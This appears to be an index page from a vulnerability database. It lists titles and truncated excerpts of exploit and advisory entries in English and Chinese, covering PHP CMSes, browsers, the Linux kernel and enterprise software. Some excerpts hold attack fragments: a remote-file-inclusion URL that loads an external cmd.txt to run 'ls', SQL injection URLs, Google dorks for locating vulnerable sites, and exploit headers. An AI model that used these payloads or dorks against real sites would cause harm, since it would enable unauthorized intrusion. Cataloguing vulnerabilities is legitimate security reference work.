Joomla 1.5.12 RCE via TinyMCE - Upload Vulnerability

No description provided by source. ?php / Joomla 1.5.12 Remote Code Execution via TinyMCE upload vulnerability Tested against : - Joomla 1.5.12 / Ubuntu 8.10 / Apache 2.2.9 - Joomla 1.5.12 / Windows XP SP2 / Apache 2.2.12 Luca daath De Fulgentis - daath at nibblesec.org http://blog.nibblesec.org ...

hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities

No description provided by source. hMAilServer 4.4.2 PHPWebAdmin local & remote file inclusion poc by Nine:Situations:Group::strawdog -------------------------------------------------------------------------------- our site: http://retrogod.altervista.org software site: http://www.hmailserver.com...

Microsoft Excel BIFF文件格式解析栈溢出漏洞（MS08-057）

BUGTRAQ ID: 31705 CVECAN ID: CVE-2008-3471 Excel是微软Office办公套件中的电子表格工具。 Excel在解析BIFF文件格式时使用文件中记录的内容计算拷贝用户提供数据的栈缓冲区的大小，如果远程攻击者在记录中设置了特制的记录值的话，就可能触发栈溢出，导致执行任意指令。 Microsoft Excel Viewer 2003 SP3 Microsoft Excel Viewer 2003 Microsoft Excel Viewer Microsoft Excel 2007 SP1 Microsoft Excel 2007 Microsoft...

Mono System.Math BigInteger整数溢出漏洞

BUGTRAQ ID: 26279 CVECAN ID: CVE-2007-5197 Mono是基于.NET框架的开源开发平台，允许开发人员构建Linux和跨平台的应用。 Mono的Mono.Math.BigInteger类在实现BigInteger数据类型时存在整数溢出漏洞，允许本地攻击者执行任意指令。 Mono Mono 2.0 Mono Mono 1.x 厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1397-1）以及相应补丁: DSA-1397-1：New mono packages fix integer overflow...

TikiWiki Tiki-Graph_Formula.PHP代码注入漏洞

TikiWiki是一款基于PHP的WIKI程序。 TikiWiki不正确处理用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题存在于tiki-graphformula.php脚本中，提交包含恶意PHP代码的参数可导致以WEB权限执行。 TikiWiki Project TikiWiki 1.9.8 目前没有解决方案提供： http://info.tikiwiki.org/tiki-index.php?page=homepage...

Forum82远程文件包含漏洞

Forum82是一款基于PHP的web应用程序。 Forum82不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'repertorylevel'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Forum82 Forum82 2.5.2 目前没有详细解决方案提供，请关注以下链接： http://forum82.sourceforge.net/...

Fully Automated Installation管理HASH密码信息泄露漏洞

Fully Automated Installation是一种基于Debian GNU/Linux平台的全自动安装集群结点机的软件包。 Fully Automated Installation存在设计错误，本地攻击者可以利用漏洞获得敏感信息。 如果安装在verbose模式，ROOT密码的HASH信息会存储在'/var/log/fai/current/fai.log'，当fai-savelog调用时，它拷贝日志文件到新安装的主机，而仍旧保留HASH信息到文件中，导致敏感信息泄露。 Thomas Lange Fully Automated Installation 3.1.2 Thomas...

ThinkPHP3.2.x 远程代码执行

...

TPshop 前台SQL注入#1

0x01 说明 TPshop开源商城系统 Thinkphp shop的简称 ，是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城，系统PC+后台是基于ThinkPHP5 MVC构架开发的跨平台开源软件，设计得非常灵活，具有模块化架构体系和丰富的功能，易于与第三方应用系统无缝集成，在设计上，包含相当全面，以模块化架构体系，让应用组合变得相当灵活，功能也相当丰富。 下载地址：http://www.tp-shop.cn/Index/Index/download.html 目录大概结构 ├─index.p...

Chrome < 62 UXSS(CVE-2017-5124)

No description provided by source. PoC.mht ------------------------- MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; ------MultipartBoundary-- Content-Type: text/html...

Pwn2Own 2017: UAF in JSC::CachedCall (WebKit)

Pwn2Own 2017: UAF in JSC::CachedCall WebKit As a quick introduction, we are Samuel Groß, AKA saelo, and Niklas Baumstark, both students at Karlsruhe Institute of Technology, and have been playing CTF together for quite some time before we decided to team up for this year’s Pwn2Own. Today we are...

ecstore app/dev/svinfo.php 信息泄露漏洞

No description provided by source...

YiDacms 最新版SQL注入漏洞二处

简要描述： YiDacms 最新版SQL注入漏洞二处 详细说明： 易达CMS 企业建站系统 当前最新版本是：YidaCms X3.2（20140718）版 文件/Yidacms/user/usermessage.asp 第一处SQL注入： None 在update时，shuaiwebuserzhuangtai和shuaiwebuseradmin没有使用全局过滤filterStr函数，导致SQL注入。 漏洞证明： 第一处SQL注入证明： 这里我们打印一下SQL语句。 存在此用户，email显示在了接收账户处 用户不存在，无法发送信息...

UCenter Home 2.0 - SQL Injection Vulnerability

No description provided by source. --==UCenter Home 2.0 -0day Remote SQL Injection Vulnerability==-- / Author : KnocKout / Greatz : DaiMon,BARCOD3,RiskY and iranian hackers / Contact: [email protected] / Cyber-Warrior.org/CWKnocKout --==--==--==--==--==--==--==--==--==--== Script : UCenter Home...

FusionPHP Fusion News 3.3/3.6 X-ForwordedFor PHP Script Code Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This may facilitate unauthorized access. ...

Eyeland Studio Inc. (game.php) SQL Injection Vulnerability

No description provided by source. Eyeland Studio Inc. game.php SQL Injection Vulnerability Author : CoBRa21 Script Home : http://www.eyeland.com/ Dork : Eyeland Studio Inc. All Rights Reserved. inurl:game.php SQL Injection:...

Microsoft ATL/MFC跟踪工具'dwmapi.dll' DLL装载任意代码执行漏洞

Bugtraq ID: 42811 CVE ID：CVE-2010-3190 Microsoft Visual Studio是微软公司的开发工具套件系列产品，是一个基本完整的开发工具集，包括了软件整个生命周期中所需要的大部分工具。 Microsoft Visual Studio中使用的ATL MFC Trace Tool AtlTraceTool8.exe工具不安全装载'dwmapi.dll'库，攻击者可以诱使用户在远程WebDAV或SMB共享上打开 TRC，cu，rs，rc或res文件，可以以用户安全上下文装载任意库。 Microsoft Visual Studio 2010 0...

Spring Framework class.classLoader类远程代码执行漏洞

BUGTRAQ ID: 40954 CVE ID: CVE-2010-1622 Spring是一个广泛部署的开源架构，帮助开发人员构建高质量的应用。 Spring框架提供了允许使用客户端所提供的数据来更新对象属性的机制，而该机制允许攻击者修改用于通过class.classloader加载对象的类加载器的属性，这可能导致执行任意命令。例如，攻击者可以将类加载器所使用的URL修改到受控的位置。 0 SpringSource Spring Framework 3.0.0 - 3.0.2 SpringSource Spring Framework 2.5.0 - 2.5.7 厂商补丁：...

Pligg CMS (story.php?id) SQL Injection Vulnerability

No description provided by source. / ! Pligg CMS story.php?id SQL Injection Vulnerability ! Author : Don Tukulesto [email protected] ! Homepage: http://indonesiancoder.com ! Date : Tue, April 27, 2010 ! Tune in : http://antisecradio.fm choose your weapon / Software Information Vendor :...

PHPizabi v0.848b C1 HFP1 Remote Privilege Escalation Vulnerability

No description provided by source. -------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo...

DMXReady Faqs Manager &lt;= 1.1 Remote Contents Change Vulnerability

No description provided by source. Title : DMXReady Faqs Manager = 1.1 Remote Contents Change Vulnerability Author : "ajann" from Turkey Contact : : S.Page : http://www.dmxready.com $$ : 24.97 $ Dork : inurl:incfaqsmanager.asp DorkEx :...

PozScripts Classified Auctions (gotourl.php id) SQL Injection Vulnerability

No description provided by source. | | | Classified Auctions gotourl.php id Remote SQL Injection Vulnerability | | |---------------- Hussin X ------------------ | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | script : http://www.pozscripts.com/index.php ...

Lizge Index.PHP远程文件包含漏洞

Lizge是一款基于PHP的WEB应用程序。 Lizge不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'index.php'脚本对用户提交的'lizge'和'bade'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Lizge Lizge V.20 http://www.lizge.com/ http://www.example.com/target/lizgepath//index.php?lizge=http://www.example.com/cmd.txt?cmd=ls...

AlberT-EasySite PSA_PATH远程文件包含漏洞

AlberT-EasySite是一款基于PHP的站点生成系统。 AlberT-EasySite在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 AlberT-EasySite没有正确地验证AES/modules/auth/phpsecurityadmin/include/logout.php文件中对PSAPATH参数的输入，允许攻击者通过包含本地或外部资源执行任意PHP代码。成功攻击要求打开了registerglobals。 AlberT AlberT-EasySite 1.0 AlberT AlberT-EasySite 0.8.12...

MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)

漏洞描述：Microsoft FrontPage服务器扩展是Microsoft公司开发的用于加强IIS Web服务器的功能的软件包。Microsoft FrontPage Server Extensions存在两个新的安全漏洞，可导致远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以FrontPage进程权限在系统上执行任意指令。 第一个漏洞是由于FrontPage服务扩展的远程调试功能上存在缓冲区溢出，这个功能用于用户远程连接FrontPage服务扩展的服务器和远程调试内容使用，如Visual...

woocommerce 插件 SQL注入漏洞

...

SonicWall NSM On-Prem命令执行漏洞（CVE-2021-20026）

...

Windows Kernel stack memory disclosure in nt!RtlpCopyLegacyContextX86(CVE-2018-0832)

We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a CONTEXT structure to user-mode memory. Two previous bugs in the nearby code area were reported in issues 1177 and 1311 ; in fact, the problem discussed here appears to be a variant of 1177 but...

Mozilla Firefox: Memory disclosure in ConvolvePixel(CVE-2017-5465)

Mozilla bug tracker link: https://bugzilla.mozilla.org/showbug.cgi?id=1347617 There is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build. PoC: Preliminary analysis: The problem seems to be the negative krenel unit length. This...

Jenkins Java Deserialization Remote Code Execution Vulnerability (CVE-2017-1000353)

Vulnerability Summary The following advisory describes Java deserialization vulnerability found in CloudBees Jenkins version 2.32.1 that leads to a Remote Code Execution. Jenkins helps to automate the non-human part of the whole software development process with now common things like continuous...

kernel: Local privilege escalation in XFRM framework（CVE-2017-7184）

A security issue was reported by ZDI, on behalf of Chaitin Security Research Lab, against the Linux kernel in Ubuntu. It also affected the upstream kernel. Chaitin Security Research Lab discovered that xfrmreplayverifylen, as called by xfrmnewae, did not verify that the user-specified replaywindo...

MetInfo 5.3 listmod.php SQL注入漏洞

No description provided by source...

Discuz 3.2 /static/js/bbcode.js 跨站脚本漏洞

No description provided by source...

@lex Guestbook <= 4.0.5 - index.php test Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/28519/info @lex Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the...

Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability

No description provided by source. Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You...

Linux Kernel 2.6.27+ - x86_64 compat Local Root Exploit

No description provided by source. / Ac1dB1tch3z Vs Linux Kernel x8664 0day Today is a sad day.. R.I.P. Tue, 29 Apr 2008 / Tue, 7 Sep 2010 a bit of history: MCASTMSFILTER Compat mode bug found... upon commit! 2 year life on this one author David L Stevens dlstevens us ibm com Tue, 29 Apr 2008...

Oracle Java lookUpByteBI - Heap Buffer Overflow

No description provided by source. Exploit Title: Oracle Java lookupByteBI function heap buffer overflow Google Dork: Date: 2013-09-03 Exploit Author: GuHe Vendor Homepage: http://www.oracle.com/ Software Link: http://www.oracle.com/technetwork/java/javase/downloads/index.html Version: 7u21 and...

TRS WCM后台SQL注入一枚

简要描述： 详细说明： 测试版本：WCM6.5，问题出在后台“新建栏目分发” 直接看图： select WCMDocument.DocId from WCMCHNLDOC,WCMDocument where WCMDocument.DocId=WCMChnlDoc.DocId and WCMChnlDoc.CHNLID=? AND 注入点 AND WCMChnlDoc.DOCSTATUS0 and WCMChnlDoc.Modal0 and WCMChnlDoc.DocChannel0 order by WCMChnlDoc.DOCORDERPRI desc,...

DedeCMS 5.7 config.php 跨站脚本漏洞

dedecms 5.7 config.php 跨站脚本漏洞 \include\dialog\config.php $cuserLogin = new userLogin; if$cuserLogin-getUserID 提示：需输入后台管理目录才能登录请输入后台管理目录名：", "javascript:;"; exit; $gurl = "../../$adminDirHand/login.php?gotopage=".urlencode$dedeNowurl; echo "location='$gurl';"; exit; 对用户提交的$adminDirHand...

Bitrix Site Manager用户身份欺骗漏洞

CVECAN ID: CVE-2013-6788 Bitrix Site Manager是一款web站点管理工具。 Bitrix Site Manager中的预购电子存储模块显示时，没能充分核查数据的真实性，远程未经认证的用户可以更改“BITRIXSMSALEUID”的cookie，浏览其他用户的购物信息和执行某些操作，如添加或删除购物车中的物品。 0 Bitrix Site Manager=12.5.13 厂商补丁： Bitrix ----- 升级"sale"模块到14.0.1版本，请到厂商的主页下载：...

DiscuzX3.1/X3/X2.5/X2 存储型XSS

简要描述： DiscuzX3.1/3/2.5/2 存储型XSS 希望通过 详细说明： DiscuzX3.1/X3/X2.5/X2 这些版本都存在 “存储型XSS” 主要是这边没有过滤 抢楼那边奖励楼层没有过滤 漏洞证明： 上些图片看看 代码 :...

MediaWiki任意文件上传漏洞

Bugtraq ID:60077 MediaWiki是一套以GPL授权发行的Wiki引擎。 MediaWiki文件上传实现存在安全漏洞，允许远程攻击者利用漏洞向受影响系统上传任意文件，并可能以WEB权限执行。 0 MediaWiki 1.20.0 - 1.20.5 MediaWiki 1.19.0 - 1.19.6 厂商解决方案 用户可联系厂商获得相应的升级或补丁程序： http://wikipedia.sourceforge.net/...

SHOPEX 4.8.5 mdl.goods.php SQL注入漏洞

漏洞核心函数 \core\modelv5\trading\mdl.goods.php codepublic function getProducts $gid, $pid = 0 $sqlWhere = ""; if 0 $pid $sqlWhere = " AND A.productid = ".$pid; //www.lpboke.com 没过滤 $sql = "SELECT A.,B.imagedefault FROM sdbproducts AS A LEFT JOIN sdbgoods AS B ON A.goodsid=B.goodsid WHERE...

IBM Rational AppScan 8.x/7.x 多个安全漏洞

CVE ID:...

Linux Kernel 'CIFSFindNext()'函数拒绝服务漏洞

Bugtraq ID: 49295 CVE ID：CVE-2011-3191 Linux是一款开放源代码的操作系统。 "CIFSFindNext"函数fs/cifs/cifssmb.c存在一个符号相关错误，发送特制的CIFS消息可使客户端崩溃。 要成功利用漏洞需要使用恶意服务器。 Linux kernel 2.6.x 厂商解决方案 目前没有详细解决方案提供： http://www.linux.org/...

马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞

在文件admin/ admininc.asp中： Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db"select mrandom,mlevel from premanager where musername='"&rCookie"musername"&"'","execute" rCookie函数在文件inc/ CommonFun.asp中 Function rCookiecookieNa...

CUPS CGI接口远程堆溢出漏洞

BUGTRAQ ID: 28307 CVECAN ID: CVE-2008-0047 Common Unix Printing System CUPS是一款通用Unix打印系统，是Unix环境下的跨平台打印解决方案，基于Internet打印协议，提供大多数PostScript和raster打印机服务。 CUPS的CGI接口处理畸形的用户请求时存在堆缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制服务器。 CUPS在TCP 631端口上监听请求，这个接口允许访问一些用于管理CUPS和提供打印任务信息的CGI应用。如果远程攻击者向这个端口提交了恶意请求的话，就可能触发堆溢出，导致执行任意指令。...

PHPMyInventory Global.Inc.PHP远程文件包含漏洞

PHPMyInventory是一款基于PHP的WEB应用程序。 PHPMyInventory不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Global.Inc.PHP'脚本对用户提交的'strIncludePrefix'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 phpMyInventory 2.8 目前没有详细解决方案提供： http://sourceforge.net/projects/phpmyinventory/...

Microsoft Internet Explorer HTML拒绝服务漏洞

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理HTML存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建如下恶意的HTML代码，诱使用户使用IE处理，可导致应用程序崩溃： usr/bin/python print "-------------------------------------------------------------------------" print " Internet Explorer 7.0.5730.11 Denial of Service"...

Cybozu Garoon SQL注入漏洞

Cybozu Garoon是一款基于PHP的WEB应用程序。 Cybozu Garoon不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是由于多个脚本对用户提交的WEB参数缺少过滤，提交恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。 Cybozu Garoon 2.1 http://garoon.cybozu.co.jp/ http://www.example.com/scripts/cbgrn/grn.exe/todo/index?cid=SQL...